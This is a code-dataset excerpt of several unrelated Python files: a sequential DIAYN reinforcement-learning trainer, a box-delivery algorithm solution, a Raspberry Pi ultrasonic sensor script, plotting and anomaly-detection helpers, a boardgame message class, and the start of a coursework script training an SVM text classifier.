the diayn reward, beta = 0 means only the true reward\n is considered while beta = 1 means it's only the diversity reward. Only active when combined_rewards\n is set to True. beta = \"auto\" is incompatible with smerl.\n :param smerl: if not None, it sets the target value for SMERL algorithm, see https://arxiv.org/pdf/2010.14484.pdf\n :param eps: if smerl is not None, it sets the margin of the reward where under esp*smerl, DIAYN reward is\n set to 0.\n :param beta_temp: only if beta='auto', sets the temperature parameter of the sigmoid for beta computation.\n :patam beta_momentum: only if beta='auto', sets the momentum parameter for beta auto update.\n \"\"\"\n\n def __init__(\n self,\n policy: Union[str, Type[DIAYNPolicy]],\n env: Union[GymEnv, str],\n prior: th.distributions,\n learning_rate: Union[float, Schedule] = 3e-4,\n buffer_size: int = 1000000,\n learning_starts: int = 100,\n batch_size: int = 256,\n tau: float = 0.005,\n gamma: float = 0.99,\n train_freq: Union[int, Tuple[int, str]] = 1,\n gradient_steps: int = 1,\n action_noise: Optional[ActionNoise] = None,\n optimize_memory_usage: bool = True,\n ent_coef: Union[str, float] = \"auto\",\n target_update_interval: int = 1,\n target_entropy: Union[str, float] = \"auto\",\n use_sde: bool = False,\n sde_sample_freq: int = -1,\n use_sde_at_warmup: bool = False,\n tensorboard_log: Optional[str] = None,\n create_eval_env: bool = False,\n policy_kwargs: Dict[str, Any] = None,\n verbose: int = 0,\n seed: Optional[int] = None,\n device: Union[th.device, str] = \"auto\",\n _init_setup_model: bool = True,\n disc_on: Union[list, str, DiscriminatorFunction] = \"all\",\n discriminator_kwargs: dict = {},\n external_disc_shape: np.ndarray = None,\n combined_rewards: bool = False,\n beta: float = 0.01,\n smerl: int = None,\n eps: float = 0.05,\n beta_temp: float = 20.0,\n beta_momentum: float = 0.8,\n beta_smooth: bool = False,\n extra_disc_buffer: bool = True,\n extra_disc_buffer_size: int = int(1e4)\n ):\n print(learning_rate)\n\n super(SEQDIAYN, self).__init__(\n policy,\n env,\n prior,\n learning_rate=learning_rate,\n buffer_size=buffer_size,\n learning_starts=learning_starts,\n batch_size=batch_size,\n tau=tau,\n gamma=gamma,\n train_freq=train_freq,\n gradient_steps=gradient_steps,\n action_noise=action_noise,\n optimize_memory_usage=optimize_memory_usage,\n ent_coef=ent_coef,\n target_update_interval=target_update_interval,\n target_entropy=target_entropy,\n use_sde=use_sde,\n sde_sample_freq=sde_sample_freq,\n use_sde_at_warmup=use_sde_at_warmup,\n tensorboard_log=tensorboard_log,\n create_eval_env=create_eval_env,\n policy_kwargs=policy_kwargs,\n verbose=verbose,\n seed=seed,\n device=device,\n _init_setup_model=_init_setup_model,\n disc_on=disc_on,\n discriminator_kwargs=discriminator_kwargs,\n external_disc_shape=external_disc_shape,\n combined_rewards=combined_rewards,\n beta=beta,\n smerl=smerl,\n eps=eps,\n beta_temp=beta_temp,\n beta_momentum=beta_momentum,\n beta_smooth=beta_smooth,\n extra_disc_buffer=extra_disc_buffer,\n extra_disc_buffer_size=extra_disc_buffer_size,\n\n )\n\n\n\n def _setup_model(self) -> None:\n super(SEQDIAYN, self)._setup_model()\n \n out_size = 2\n self.discriminators = [Discriminator(\n self.disc_obs_shape, out_size, device=self.device, **self.discriminator_kwargs\n ) for i in range(self.n_skills)]\n \n \n\n def train(self, gradient_steps: int, batch_size: int = 64) -> None:\n # Update optimizers learning rate\n optimizers = [self.actor.optimizer, self.critic.optimizer]\n if self.ent_coef_optimizer is not None:\n optimizers += [self.ent_coef_optimizer]\n\n # Update learning rate according to lr schedule\n self._update_learning_rate(optimizers)\n\n ent_coef_losses, ent_coefs = deque(maxlen=1000),deque(maxlen=1000)\n actor_losses, critic_losses, disc_losses = deque(maxlen=1000),deque(maxlen=1000),deque(maxlen=1000)\n\n for gradient_step in range(gradient_steps):\n # Sample replay buffer\n replay_data = self.replay_buffer.sample(\n batch_size, env=self._vec_normalize_env\n )\n\n \n # We need to sample because `log_std` may have changed between two gradient steps\n if self.use_sde:\n self.actor.reset_noise()\n\n # Action by the current actor for the sampled state\n # We concatenate state with current one hot encoded skill\n obs = th.cat([replay_data.observations, replay_data.zs], dim=1)\n #print(\"Zs :\",replay_data.zs)\n actions_pi, log_prob = self.actor.action_log_prob(obs)\n log_prob = log_prob.reshape(-1, 1)\n\n ent_coef_loss = None\n if self.ent_coef_optimizer is not None:\n # Important: detach the variable from the graph\n # so we don't change it with other losses\n # see https://github.com/rail-berkeley/softlearning/issues/60\n ent_coef = th.exp(self.log_ent_coef.detach())\n ent_coef_loss = -(\n self.log_ent_coef * (log_prob + self.target_entropy).detach()\n ).mean()\n ent_coef_losses.append(ent_coef_loss.item())\n else:\n ent_coef = self.ent_coef_tensor\n\n ent_coefs.append(ent_coef.item())\n\n # Optimize entropy coefficient, also called\n # entropy temperature or alpha in the paper\n if ent_coef_loss is not None:\n self.ent_coef_optimizer.zero_grad()\n ent_coef_loss.backward()\n self.ent_coef_optimizer.step()\n\n with th.no_grad():\n # Select action according to policy\n # We concatenate next state with current one hot encoded skill\n new_obs = th.cat([replay_data.next_observations, replay_data.zs], dim=1)\n next_actions, next_log_prob = self.actor.action_log_prob(new_obs)\n # Compute the next Q values: min over all critics targets\n next_q_values = th.cat(self.critic_target(new_obs, next_actions), dim=1)\n next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)\n # add entropy term\n next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)\n # td error + entropy term\n target_q_values = (\n replay_data.rewards\n + (1 - replay_data.dones) * self.gamma * next_q_values\n )\n\n # Get current Q-values estimates for each critic network\n # using action from the replay buffer\n\n current_q_values = self.critic(obs, replay_data.actions)\n\n # Compute critic loss\n critic_loss = 0.5 * sum(\n [\n F.mse_loss(current_q, target_q_values)\n for current_q in current_q_values\n ]\n )\n critic_losses.append(critic_loss.item())\n\n # Optimize the critic\n self.critic.optimizer.zero_grad()\n critic_loss.backward()\n self.critic.optimizer.step()\n\n # Compute actor loss\n # Alternative: actor_loss = th.mean(log_prob - qf1_pi)\n # Mean over all critic networks\n q_values_pi = th.cat(self.critic.forward(obs, actions_pi), dim=1)\n min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)\n actor_loss = (ent_coef * log_prob - min_qf_pi).mean()\n actor_losses.append(actor_loss.item())\n\n # Optimize the actor\n self.actor.optimizer.zero_grad()\n actor_loss.backward()\n self.actor.optimizer.step()\n\n # Update target networks\n if gradient_step % self.target_update_interval == 0:\n polyak_update(\n self.critic.parameters(), self.critic_target.parameters(), self.tau\n )\n\n\n if not self.extra_disc_buffer:\n replay_data_disc = replay_data\n\n else: \n replay_data_disc = self.disc_buffer.sample(\n batch_size, env=self._vec_normalize_env\n )\n\n if self.external_disc_shape:\n disc_obs = replay_data_disc.disc_obs\n \n\n else:\n # Get or compute vector to pass to the discriminator\n if isinstance(self.disc_on, DiscriminatorFunction):\n disc_obs = self.disc_on(replay_data_disc.observations)\n else:\n disc_obs = replay_data_disc.observations[:, self.disc_on]\n \n cur_disc = self.discriminators[self.training_skill]\n log_q_phi = cur_disc(disc_obs.to(self.device)).to(self.device)\n z = replay_data_disc.zs.to(self.device)\n c = (z.argmax(dim=1)==self.training_skill) * 1\n\n discriminator_loss = th.nn.NLLLoss()(log_q_phi, c)\n disc_losses.append(discriminator_loss.item())\n cur_disc.optimizer.zero_grad()\n discriminator_loss.backward()\n cur_disc.optimizer.step()\n\n self._n_updates += gradient_steps\n\n self.logger.record(\"train/n_updates\", self._n_updates, exclude=\"tensorboard\")\n self.logger.record(\"train/ent_coef\", np.mean(ent_coefs))\n self.logger.record(\"train/actor_loss\", np.mean(actor_losses))\n self.logger.record(\"train/critic_loss\", np.mean(critic_losses))\n self.logger.record(\"train/discriminator_loss\", np.mean(disc_losses))\n self.disc_loss = np.mean(disc_losses)\n if len(ent_coef_losses) > 0:\n self.logger.record(\"train/ent_coef_loss\", np.mean(ent_coef_losses))\n\n def learn(\n self,\n total_timesteps: int,\n callback: MaybeCallback = None,\n log_interval: int = 4,\n eval_env: Optional[GymEnv] = None,\n eval_freq: int = -1,\n n_eval_episodes: int = 5,\n tb_log_name: str = \"run\",\n eval_log_path: Optional[str] = None,\n reset_num_timesteps: bool = True,\n ) -> \"OffPolicyAlgorithm\":\n\n total_timesteps, callback = self._setup_learn(\n total_timesteps,\n eval_env,\n callback,\n eval_freq,\n n_eval_episodes,\n eval_log_path,\n reset_num_timesteps,\n tb_log_name,\n )\n\n callback.on_training_start(locals(), globals())\n self.training_skill = 0\n self.learning_starts_0 = self.learning_starts\n while self.num_timesteps < total_timesteps and self.training_skill < self.n_skills:\n \n\n\n\n # sample skill z according to prior before generating episode\n probs = th.ones(self.training_skill+1)/(self.training_skill+1)\n probs = th.nn.functional.pad(probs, [0,self.n_skills-self.training_skill-1])\n prior = th.distributions.OneHotCategorical(probs)\n z = prior.sample().to(self.device)\n\n rollout = self.collect_rollouts(\n self.env,\n train_freq=self.train_freq,\n action_noise=self.action_noise,\n callback=callback,\n learning_starts=self.learning_starts,\n replay_buffer=self.replay_buffer,\n log_interval=log_interval,\n z=z,\n disc_buffer=self.disc_buffer\n )\n if rollout.continue_training is False:\n break\n\n if self.num_timesteps > 0 and self.num_timesteps > self.learning_starts:\n # If no `gradient_steps` is specified,\n # do as many gradients steps as steps performed during the rollout\n gradient_steps = (\n self.gradient_steps\n if self.gradient_steps > 0\n else rollout.episode_timesteps\n )\n \n self.train(batch_size=self.batch_size, gradient_steps=gradient_steps)\n\n if self.training_skill == 0:\n objective = self.smerl * (1-self.eps/2)\n else:\n objective = self.smerl * (1-self.eps)\n mean_true_reward = [\n ep_info.get(f\"r_true_{self.training_skill}\")\n for ep_info in self.ep_info_buffer\n ]\n mean_true_reward = safe_mean(\n mean_true_reward, where=~np.isnan(mean_true_reward)\n )\n if np.isnan(mean_true_reward):\n mean_true_reward = 0.0\n\n if mean_true_reward >= objective and self.disc_loss < 0.1:\n\n self.learning_starts = self.num_timesteps+self.learning_starts_0\n self.replay_buffer.reset()\n self.training_skill += 1\n \n\n\n\n callback.on_training_end()\n return self\n\n \n\n def collect_rollouts(\n self,\n env: VecEnv,\n z: th.Tensor,\n callback: BaseCallback,\n train_freq: TrainFreq,\n replay_buffer: Union[ReplayBufferZ,ReplayBufferZExternalDisc],\n action_noise: Optional[ActionNoise] = None,\n learning_starts: int = 0,\n log_interval: Optional[int] = None,\n disc_buffer = None\n ) -> RolloutReturnZ:\n \"\"\"\n Collect experiences and store them into a ``ReplayBuffer``.\n\n :param env: The training environment\n :param z: The one hot encoding of the active skill\n :param callback: Callback that will be called at each step\n (and at the beginning and end of the rollout)\n :param train_freq: How much experience to collect\n by doing rollouts of current policy.\n Either ``TrainFreq(, TrainFrequencyUnit.STEP)``\n or ``TrainFreq(, TrainFrequencyUnit.EPISODE)``\n with ```` being an integer greater than 0.\n :param action_noise: Action noise that will be used for exploration\n Required for deterministic policy (e.g. TD3). This can also be used\n in addition to the stochastic policy for SAC.\n :param learning_starts: Number of steps before learning for the warm-up phase.\n :param replay_buffer:\n :param log_interval: Log data every ``log_interval`` episodes\n :return:\n \"\"\"\n diayn_episode_rewards, total_timesteps = [], []\n observed_episode_rewards = []\n num_collected_steps, num_collected_episodes = 0, 0\n\n assert isinstance(env, VecEnv), \"You must pass a VecEnv\"\n assert env.num_envs == 1, \"OffPolicyAlgorithm only support single environment\"\n assert train_freq.frequency > 0, \"Should at least collect one step or episode.\"\n\n if self.use_sde:\n self.actor.reset_noise()\n\n callback.on_rollout_start()\n continue_training = True\n while should_collect_more_steps(\n train_freq, num_collected_steps, num_collected_episodes\n ):\n done = False\n # we separe true rewards from self created diayn rewards\n true_episode_reward, episode_timesteps = 0.0, 0\n diayn_episode_reward = 0.0\n observed_episode_reward = 0.0\n while not done:\n\n if (\n self.use_sde\n and self.sde_sample_freq > 0\n and num_collected_steps % self.sde_sample_freq == 0\n ):\n # Sample a new noise matrix\n self.actor.reset_noise()\n\n # Select action randomly or according to policy\n action, buffer_action = self._sample_action(\n learning_starts, z, action_noise\n )\n\n # Rescale and perform action\n new_obs, true_reward, done, infos = env.step(action)\n done = done[0]\n\n\n\n if self.external_disc_shape:\n disc_obs = callback.on_step()\n else:\n if isinstance(self.disc_on, DiscriminatorFunction):\n disc_obs = self.disc_on(new_obs)\n else:\n disc_obs = new_obs[:, self.disc_on]\n #print(disc_obs)\n\n cur_disc = self.discriminators[z.argmax().detach().cpu()]\n z_idx = np.argmax(z.cpu()).item()\n if self.training_skill == z_idx:\n c = 1\n else:\n c = 0\n log_q_phi = (\n cur_disc(disc_obs)[:, 1].detach().cpu().numpy()\n )\n\n\n\n if isinstance(self.log_p_z, th.Tensor):\n self.log_p_z = self.log_p_z.cpu().numpy()\n\n log_p_z = np.log([z_idx/(z_idx+1)+1e-10, 1/(z_idx+1)])\n diayn_reward = log_q_phi - log_p_z[1]\n\n\n\n # beta update and logging\n if self.combined_rewards:\n if self.beta == \"auto\":\n \n \"\"\"\n mean_diayn_reward = [\n ep_info.get(f\"r_diayn_{z_idx}\")\n for ep_info in self.ep_info_buffer\n ]\n mean_diayn_reward = safe_mean(\n mean_diayn_reward, where=~np.isnan(mean_diayn_reward)\n )\n mean_true_reward = [\n ep_info.get(f\"r_true_{z_idx}\")\n for ep_info in self.ep_info_buffer\n ]\n mean_true_reward = safe_mean(\n mean_true_reward, where=~np.isnan(mean_true_reward)\n )\n if np.isnan(mean_true_reward):\n mean_true_reward = 0.0\n if np.isnan(mean_diayn_reward):\n mean_diayn_reward = 0.0\n last_beta = self.beta_buffer[-1][z_idx]\n beta = (\n sigm(\n (mean_true_reward - mean_diayn_reward) / self.beta_temp\n )\n * (1 - self.beta_momentum)\n + last_beta * self.beta_momentum\n )\n reward = beta * diayn_reward + (1 - beta) * true_reward\n betas = self.beta_buffer[-1].copy()\n betas[z_idx] = beta\n self.beta_buffer.append(betas)\n \"\"\" \n\n\n\n\n elif self.smerl:\n mean_true_reward = [\n ep_info.get(f\"r_true_{z_idx}\")\n for ep_info in self.ep_info_buffer\n ]\n\n\n mean_true_reward = safe_mean(\n mean_true_reward, where=~np.isnan(mean_true_reward)\n )\n\n\n if np.isnan(mean_true_reward):\n mean_true_reward = 0.0\n\n if self.beta_smooth :\n a = self.smerl+np.abs(self.eps * self.smerl)\n beta_on = self.beta * sigm(mean_true_reward*2/a - 2)\n else:\n beta_on = float(\n (\n mean_true_reward\n >= self.smerl - np.abs(self.eps * self.smerl)\n ) * self.beta\n )\n betas = self.beta_buffer[-1].copy()\n betas[z_idx] = beta_on\n self.beta_buffer.append(betas)\n # add beta*diayn_reward if mean_reward is closer than espilon*smerl to smerl\n reward = diayn_reward * beta_on + true_reward\n else:\n reward = self.beta * diayn_reward + true_reward\n\n else:\n reward = diayn_reward\n\n self.num_timesteps += 1\n episode_timesteps += 1\n num_collected_steps += 1\n\n # Give access to local variables\n callback.update_locals(locals())\n # Only stop training if return value is False, not when it is None.\n \n if callback.on_step() is False:\n return RolloutReturnZ(\n 0.0,\n num_collected_steps,\n num_collected_episodes,\n continue_training=False,\n z=z,\n )\n\n true_episode_reward += true_reward\n diayn_episode_reward += diayn_reward\n observed_episode_reward += reward\n\n # Retrieve reward and episode length if using Monitor wrapper\n for idx, info in enumerate(infos):\n #print(\"Before\",info)\n maybe_ep_info = info.get(\"episode\")\n if maybe_ep_info:\n for i in range(self.prior.event_shape[0]):\n maybe_ep_info[f\"r_diayn_{i}\"] = np.nan\n maybe_ep_info[f\"r_true_{i}\"] = np.nan\n if self.combined_rewards:\n if self.beta == \"auto\" or self.smerl:\n maybe_ep_info[f\"beta_{i}\"] = betas[i]\n maybe_ep_info[f\"r_diayn_{z_idx}\"] = diayn_episode_reward[0]\n maybe_ep_info[f\"r_true_{z_idx}\"] = true_episode_reward[0]\n maybe_ep_info[\"r\"] = observed_episode_reward[0]\n #print(\"After\",info)\n\n self._update_info_buffer(infos, done)\n\n # Store data in replay buffer (normalized action and unnormalized observation)\n z_store = z.clone().detach().cpu().numpy()\n\n if self.external_disc_shape:\n self._store_transition(\n replay_buffer, buffer_action, new_obs, reward, done, infos, z_store, disc_obs\n )\n\n if disc_buffer:\n self._store_transition(\n disc_buffer, buffer_action, new_obs, reward, done, infos, z_store, disc_obs\n )\n\n\n else:\n self._store_transition(\n replay_buffer, buffer_action, new_obs, reward, done, infos, z_store\n )\n\n if disc_buffer:\n self._store_transition(\n disc_buffer, buffer_action, new_obs, reward, done, infos, z_store\n )\n\n\n self._update_current_progress_remaining(\n self.num_timesteps, self._total_timesteps\n )\n\n # For DQN, check if the target network should be updated\n # and update the exploration schedule\n # For SAC/TD3, the update is done as the same time as the gradient update\n # see https://github.com/hill-a/stable-baselines/issues/900\n self._on_step()\n\n if not should_collect_more_steps(\n train_freq, num_collected_steps, num_collected_episodes\n ):\n break\n\n if done:\n num_collected_episodes += 1\n self._episode_num += 1\n diayn_episode_rewards.append(diayn_episode_reward)\n total_timesteps.append(episode_timesteps)\n\n if action_noise is not None:\n action_noise.reset()\n\n # Log training infos\n if log_interval is not None and self._episode_num % log_interval == 0:\n self._dump_logs()\n\n diayn_mean_reward = (\n np.mean(diayn_episode_rewards) if num_collected_episodes > 0 else 0.0\n )\n callback.on_rollout_end()\n #print(diayn_episode_rewards)\n return RolloutReturnZ(\n diayn_mean_reward,\n num_collected_steps,\n num_collected_episodes,\n continue_training,\n z=z,\n )","sub_path":"stable_baselines3/diayn/seq_diayn.py","file_name":"seq_diayn.py","file_ext":"py","file_size_in_byte":30298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298402052","text":"from typing import List\nfrom collections import deque\n\nclass Solution:\n def boxDelivering(self, boxes: List[List[int]], portsCount: int, maxBoxes: int, maxWeight: int) -> int:\n def getArray() -> List[int]:\n return [0] * (n + 1)\n \n n = len(boxes)\n p, w, neg, W = getArray(), getArray(), getArray(), getArray()\n\n for i in range(1, n + 1):\n p[i], w[i] = boxes[i - 1]\n if i > 1:\n neg[i] = neg[i - 1] + (p[i - 1] != p[i])\n W[i] = W[i - 1] + w[i]\n \n opt = deque([0])\n f, g = getArray(), getArray()\n \n for i in range(1, n + 1):\n while i - opt[0] > maxBoxes or W[i] - W[opt[0]] > maxWeight:\n opt.popleft()\n \n f[i] = g[opt[0]] + neg[i] + 2\n \n if i != n:\n g[i] = f[i] - neg[i + 1]\n while opt and g[i] <= g[opt[-1]]:\n opt.pop()\n opt.append(i)\n \n return f[n]\n\nif __name__ == \"__main__\":\n boxes = [[1,1],[2,1],[1,1]]\n portsCount = 2\n maxBoxes = 3\n maxWeight = 3\n print(Solution().boxDelivering(boxes, portsCount, maxBoxes, maxWeight))\n","sub_path":"src/1687. Delivering Boxes from Storage to Ports/1687.py","file_name":"1687.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95508403","text":"import RPi.GPIO as GPIO\nimport time\n\ntrigger = 19\necho = 26\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(trigger, GPIO.OUT)\nGPIO.setup(echo, GPIO.IN)\n\ndef distanz():\n\tGPIO.output(trigger, GPIO.HIGH)\n\ttime.sleep(0.00001)\n\tGPIO.output(trigger, GPIO.LOW)\n\n\twhile GPIO.input(echo) == 0:\n\t\tStartZeit = time.time()\n\twhile GPIO.input(echo) == 1:\n\t\tStopZeit = time.time()\n\tZeit = StopZeit - StartZeit\n\tdistanz = (Zeit * 34300) / 2\n\treturn distanz\n\ntry:\n\twhile True:\n\t\tabstand = distanz()\n\t\tprint(\"Gemessene Entfernung = %.1f cm\" % abstand)\n\t\ttime.sleep(1)\n\nexcept KeyboardInterrupt:\n\tprint(\"Meesung vom User gestoppt\")\n\tGPIO.cleanup()","sub_path":"Python/Raspberry Pi 3/Programs/Parkhaus/Test_Ultrasonic.py","file_name":"Test_Ultrasonic.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210068135","text":"import matplotlib.pyplot as plt\n\n\ndef print_dict(dict):\n nb = 0\n for value in dict:\n nb = nb + value[1]\n print(\"Word:\", value[0], \", occurrence:\", value[1])\n print(\"Total words: \", nb)\n\n\ndef graph(dict, nb, win_x, win_y, filename):\n print_dict(dict)\n words = []\n number = []\n i = 0\n if nb > len(dict):\n nb = len(dict)\n while i < nb:\n words.append(dict[i][0])\n number.append(dict[i][1])\n i += 1\n plt.figure(figsize=(win_x, win_y))\n plt.plot(words, number)\n graph_name = \"Number of word occurrence in \" + filename\n plt.title(graph_name)\n plt.ylabel('Occurrences')\n plt.xlabel('Words')\n plt.show()\n plt.close()","sub_path":"src/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96390409","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom cycler import cycler\n\nfrom pmmif import featherpmm\n\nfrom gen import sim_dist, sim_week, add_actual\n\nBLUE = '#204080'\n\n\ndef get_week():\n df = featherpmm.read_dataframe('data/week.feather').df\n return df.set_index('date')\n\n\ndef get_day():\n return featherpmm.read_dataframe('data/day.feather').df\n\n\ndef get_week_actual():\n df = featherpmm.read_dataframe('data/actual.feather').df\n return df.set_index('date')\n\n\ndef plot_ref_hour_of_day(df, save_path):\n \"\"\"\n Saves an SVG plot to the path given, showing the distribution\n of values in df by hour of day.\n \"\"\"\n bounds = list(range(1, 24))\n df['time_of_day_hour_bins'] = np.digitize(df.time, bounds)\n counts = df.groupby('time_of_day_hour_bins')['time'].count()\n plt.figure()\n counts.plot.bar(color=BLUE, title='Average Volume by Hour of Day')\n plt.savefig(save_path)\n\n\ndef plot_week(df, outpath):\n \"\"\"\n Plots df as a line graph, saving result as SVG to output\n \"\"\"\n plt.figure()\n df.plot.line(color=BLUE, title='Volume by Hour of Day, 7 days')\n plt.savefig(outpath)\n\n\ndef plot_actual_vs_expected(df, outpath):\n \"\"\"\n Plots df as a line graph, saving result as SVG to output\n \"\"\"\n plt.figure()\n plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'orange'])))\n df.plot.line(title='Volume by Hour of Day, 7 days', figsize=(10, 4))\n plt.grid(b=True, which='both', color='0.80', linestyle='-')\n plt.ylim((0, 3000))\n plt.savefig(outpath)\n\n\ndef plot_actual_vs_limits(df, outpath):\n df['upper'] = np.maximum(df['expected'] * 1.5,\n df['expected'] + 150)\n df['lower'] = np.minimum(df['expected'] * 0.67,\n np.maximum(df['expected'] - 150, 0))\n del df['expected']\n\n plt.figure()\n fig, (ax0, ax1) = plt.subplots(nrows=2)\n plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'red', 'green'])))\n df.plot.line(title='Volume by Hour of Day, 7 days', figsize=(10, 4))\n plt.grid(b=True, which='both', color='0.80', linestyle='-')\n plt.ylim((0, 3000))\n plt.savefig(outpath)\n\n\ndef detect_anomalies(df):\n df['upper'] = np.maximum(df['expected'] * 1.5,\n df['expected'] + 150)\n df['lower'] = np.minimum(df['expected'] * 0.67,\n np.maximum(df['expected'] - 150, 0))\n df['actual_min_ok'] = df['actual'] >= df['lower']\n df['actual_max_ok'] = df['actual'] <= df['upper']\n\n\ndef print_anomalies(df):\n print(df[np.logical_not(np.logical_and(df['actual_min_ok'],\n df['actual_max_ok']))])\n\n\ndef ensure_dir_exists(d):\n if not os.path.isdir(d):\n if os.path.exists(d):\n raise('Output directory %s exists but is not a directory' % d)\n else:\n os.mkdir(d)\n\n\ndef main():\n ensure_dir_exists('graphs')\n df_week_actual = get_week_actual()\n plot_actual_vs_expected(df_week_actual.copy(),\n 'graphs/week-actual-vs-expected.svg')\n# plot_actual_vs_limits(df_week_actual.copy(),\n# 'graphs/week-actual-vs-limits.svg')\n\n\nif __name__ == '__main__':\n pd.set_option('display.width', 200)\n main()\n","sub_path":"anomaly detection/pydatalondon2018ad/ad_norm_hour_day/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31008799","text":"from typing import List\n\nfrom BoardgameSimulator.Core import receive_message_from_process\nfrom BoardgameSimulator.Core import send_message_to_process\nfrom BoardgameSimulator.Enums import BoardgameMessageTypes\nfrom BoardgameSimulator.BoardgameMessages import BoardgameMessage\n\n\nclass BoardgameRequestJudgement(BoardgameMessage):\n def __init__(self):\n \"\"\"\n [ World -> BoardgameJudge ]\n Request for judge whether game is over or not.\n\n Attributes:\n header Header\n total_player_count Count of every enrolled player\n player_indexes BoardgamePlayer number for each player, Same order as player_names\n row_count Board row count (Expected not to be use, still remains for future development)\n column_count Board column count (Expected not to be use, still remains for future development)\n board_status Board status as list of list, including blanks\n \"\"\"\n super(BoardgameRequestJudgement, self).__init__()\n self.header: str = BoardgameMessageTypes.RequestJudgement\n self.total_player_count: int = 0\n self.player_indexes: List[int] = []\n self.row_count: int = 0\n self.column_count: int = 0\n self.board_status: List[List[int]] = [[]]\n\n def print_information(self):\n property_names = [\n \"header\",\n \"total_player_count\",\n \"player_indexes\",\n \"row_count\",\n \"column_count\",\n \"board_status\",\n ]\n information_dictionary = self.create_information_dictionary_from_keyword(property_names)\n self.print_information_dictionary(information_dictionary)\n\n def receive_message_from_process(self) -> None:\n \"\"\"\n Read message from process and parse into message itself.\n \"\"\"\n super(BoardgameRequestJudgement, self).receive_message_from_process()\n\n delim = BoardgameMessage.delim()\n end_of_message = BoardgameMessage.end_of_message()\n std_in = BoardgameMessage.std_in()\n\n self.player_indexes = []\n self.board_status = [[]]\n\n self.total_player_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n for i in range(self.total_player_count):\n self.player_indexes.append(int(receive_message_from_process(delim=delim, std_in=std_in)))\n\n self.row_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n self.column_count = int(receive_message_from_process(delim=delim, std_in=std_in))\n self.board_status = [[] for _ in range(self.column_count)]\n\n for i in range(self.row_count):\n for j in range(self.column_count):\n self.board_status[i].append(int(receive_message_from_process(\n delim=delim if (i + 1) * (j + 1) != (self.row_count * self.column_count) else end_of_message,\n std_in=std_in)))\n\n def send_message_to_process(self) -> None:\n \"\"\"\n Send message to process based on current message data.\n \"\"\"\n super(BoardgameRequestJudgement, self).send_message_to_process()\n\n delim = BoardgameMessage.delim()\n end_of_message = BoardgameMessage.end_of_message()\n std_out = BoardgameMessage.std_out()\n\n send_message_to_process(self.header, delim=delim, std_out=std_out)\n send_message_to_process(self.row_count, delim=delim, std_out=std_out)\n send_message_to_process(self.column_count, delim=delim, std_out=std_out)\n\n for i in range(self.row_count):\n for j in range(self.column_count):\n send_message_to_process(\n self.board_status[i][j],\n delim=delim if (i + 1) * (j + 1) != (self.row_count * self.column_count) else end_of_message,\n std_out=std_out)\n\n\nif __name__ == \"__main__\":\n testMessage = BoardgameRequestJudgement()\n testMessage.row_count = 2\n testMessage.column_count = 3\n testMessage.board_status = [[1, 2, 0], [0, 0, 1]]\n testMessage.send_message_to_process()\n print(\"EOF\")\n","sub_path":"BoardgameSimulator/BoardgameMessages/BoardgameRequestJudgement.py","file_name":"BoardgameRequestJudgement.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181422767","text":"import helper\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport numpy as np\nimport sys\n\n##test_data = 'test_data.txt'\ntest_data='submission/v3/modified_data.txt'\n##def fool_classifier(test_data): ## Please do not change the function defination...\n## ## Read the test data file, i.e., 'test_data.txt' from Present Working Directory...\n## \n## \n## You are supposed to use pre-defined class: 'strategy()' in the file `helper.py` for model training (if any),\n# and modifications limit checking\n\nstrategy_instance=helper.strategy() \nparameters={'gamma': 0.0001,\n 'C': 10 ** 2,\n 'kernel': 'poly',\n 'degree': 3,\n 'coef0': 12}\n\ntest_file = test_data\n\nclass_0 = strategy_instance.class0\nclass_1 = strategy_instance.class1\ntest = []\n\nwith open(test_file) as testFile:\n test = [line.strip().split(' ') for line in testFile]\n\nclass_all = class_0 + class_1\n\n\n\ndic_class_0_1 = {}\n\ndic_test = {}\nvocabulary_test = set()\nwordCountTest = 0\n\n\nvocabulary_all = set()\nfor sentence in class_all:\n for word in sentence:\n vocabulary_all.add(word)\n if word not in dic_class_0_1:\n dic_class_0_1[word] = 1\n else:\n dic_class_0_1[word] += 1\n\nfor sentence in test:\n for word in sentence:\n wordCountTest += 1\n vocabulary_test.add(word)\n if word not in dic_test:\n dic_test[word] = 1\n else:\n dic_test[word] += 1\n\n\n\nword_list_class_0_1 = []\nfor word in dic_class_0_1:\n word_list_class_0_1.append(word)\n\n\nword_list_test = []\nfor word in dic_test:\n word_list_test.append(word)\n \n\ntrain_data_matrix = []\n\nfor sample in class_all:\n temp_list = []\n for word in word_list_class_0_1:\n temp_list.append(sample.count(word))\n train_data_matrix.append(temp_list)\n\ntrain_data_matrix = np.array(train_data_matrix)\n\n\n\n\ntest_data_matrix = []\nfor sample in test:\n temp_list = []\n for word in word_list_class_0_1:\n temp_list.append(sample.count(word))\n test_data_matrix.append(temp_list)\n\ntest_data_matrix = np.array(test_data_matrix)\n\n\ny_train = [0] * 360 + [1] * 180\ny_train = np.array(y_train)\n\n\ny_test = [1] * 200\ny_test = np.array(y_test)\n\n\n\n## Select best parameters:\n\nclf = svm.SVC(kernel = 'poly', C = 10 ** 2, coef0 = 12, degree = 3, gamma = 0.0001)\n#clf = strategy_instance.train_svm(parameters, train_data_matrix, 